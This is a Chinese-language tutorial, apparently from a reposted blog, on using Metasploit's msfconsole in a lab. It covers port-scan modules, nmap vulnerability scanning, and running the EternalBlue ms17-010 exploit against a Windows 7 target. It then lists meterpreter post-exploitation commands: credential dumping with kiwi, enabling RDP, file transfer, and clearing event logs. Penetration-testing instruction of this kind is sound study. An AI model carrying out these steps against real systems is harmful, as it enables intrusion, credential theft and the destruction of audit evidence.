当前位置: 首页 > news >正文

kali——msfconsole的使用

目录

前言

msfconsole的使用基础

启动mfsconsole

各种辅助模块的使用

端口扫描模块(portscan)

查看端口扫描的模块

使用模块

查看所需设置

手动设置

执行

退出

各种漏洞模块的使用

nmap扫描主机漏洞

查看漏洞模块

使用漏洞模块

查看所需设置

执行(开始攻击)


前言

msfconsole,全称Metasploit Framework console,是一个开源的渗透测试框架,主要用于网络安全评估和漏洞利用。它包含了各种漏洞利用模块、木马生成工具以及多种渗透文件。该工具不仅能够进行端口扫描、服务检测,还能利用已知漏洞攻击靶机,甚至生成各种渗透文件和木马

这里靶机任然是centos服务机,ip地址为192.168.100.130。


msfconsole的使用基础

启动mfsconsole

msfconsole

msfconsole每次启动时,都会出现不同的有趣的图案。


各种辅助模块的使用

这里的模块很多,比如辅助模块,漏洞模块,攻击载荷……

search 模块————查看模块

use 编号————使用具体的模块

show options————查看所需设置

set 设置名 内容————手动设置

run / exploit————执行

back / exit————退出

端口扫描模块(portscan)

这里演示的是辅助模块 “端口扫描” 的使用

查看端口扫描的模块
search portscan

结果中共有8个供选择的端口扫描模块


使用模块
use 编号
或
use 模块具体名称

比如这里使用1模块:

use 1或者use auxiliary/scanner/natpmp/natpmp_portscan


查看所需设置
show options

结果中yes表示需要手动设置,也可以默认使用对应左边的设置;no表示不需要设置。

这里结果显示 1 模块需要设置lifetime,ports,protocol,rhosts,rport,threads

由于rhosts默认设置为空,所以我们必须手动设置rhosts,其他几项使用默认设置。


手动设置
set 设置名 内容

set rhosts 192.168.100.130

及设置目标IP为192.168.100.130


执行
run
或者
exploit

结果没有显示该端口OPEN,即该端口为关闭状态。


退出

退出到msf6——back

完全退出——exit


各种漏洞模块的使用

如果已知主机有某个漏洞,就可以直接使用该漏洞模块,基本用法和辅助模块基本一致。

这里我们使用windows7 做靶机,kali机做攻击机。

nmap扫描主机漏洞

nmap -script=vuln 主机IP

nmap -script=vuln 192.168.100.132

扫描结果显示目标主机可能有ms17-010漏洞,即永恒之蓝漏洞。


查看漏洞模块

search ms17-010

可以使用的模块有5个,24模块auxiliary/scanner/smb/smb_ms17_010可以用来进一步判断目标主机是否有ms17-010漏洞;0模块exploit/windows/smb/ms17_010_eternalblue用于漏洞攻击。


使用漏洞模块

这里就直接使用0模块exploit/windows/smb/ms17_010_eternalblue来利用漏洞攻击主机,就不适用24模块进一步验证了。

use 0或者use exploit/windows/smb/ms17_010_eternalblue


查看所需设置

show options

结果显示需要手动设置RHOSTS,其他几项可以不用设置或使用默认设置。


手动设置

set rhosts 目标地址

set rhosts 192.168.100.132


执行(开始攻击)

run 或者 exploit

如果攻击成功,就会进入目标机的cmd管理界面meterpreter>,然后可以进行下列操作:

getsystem查看权限

screenshot捕获主机当前屏幕截屏

upload file.txt c://    将file.txt文件上传到目标机c://

download d://1.txt        下载目标机d://1.txt文件

idletime    检查目标系统空闲时间

load kiwi加载猕猴桃插件,输入creds kerveros 抓取目标主机用户和密码

run post/windows/manage/enable_rdp    启用目标主机远程桌面连接,然后输入rdesktop ip地址:远程连接目标主机桌面,结合抓取到的用户密码登录

clearev清除日志记录


输入shell进入终端命令行meterpreter>shell

chcp 65001解决终端乱码问题

dir查看所有目录
net user查看用户
exit退出命令行




http://www.mrgr.cn/news/20127.html

相关文章:

  • 【计算机视觉前沿研究 热点 顶会】ECCV 2024中扩散模型有关的论文
  • 【Qt】Qt和JavaScript使用QWebChannel交互
  • 等保测评中的数据安全风险评估:企业实战
  • Linux:深入剖析计算机软硬件架构
  • 阿贝云免费虚拟主机和免费云服务器评测
  • 本地电脑交叉编译ffmpeg 到 windows on arm64
  • go程序解说
  • 没有35类可以做特许经营加盟不!
  • 字节内部培训的《大模型落地应用案例集》,52个大模型落地精选案例!
  • 前端登录鉴权——以若依Ruoyi前后端分离项目为例解读
  • 全球主要论文知识库-学习资源
  • 比特币客户端和API
  • 体会循环---冒泡排序
  • CTFHub技能树-备份文件下载-网站源码
  • 05 C++语言---左值右值
  • 数据分析:R语言计算XGBoost线性回归模型的SHAP值
  • 异步编程学习
  • 应用层协议HTTP
  • 钢琴灯品牌排行榜前十名有哪些?钢琴灯品牌排行榜前十名
  • 【ubuntu使用笔记】nvme磁盘挂载失败问题记录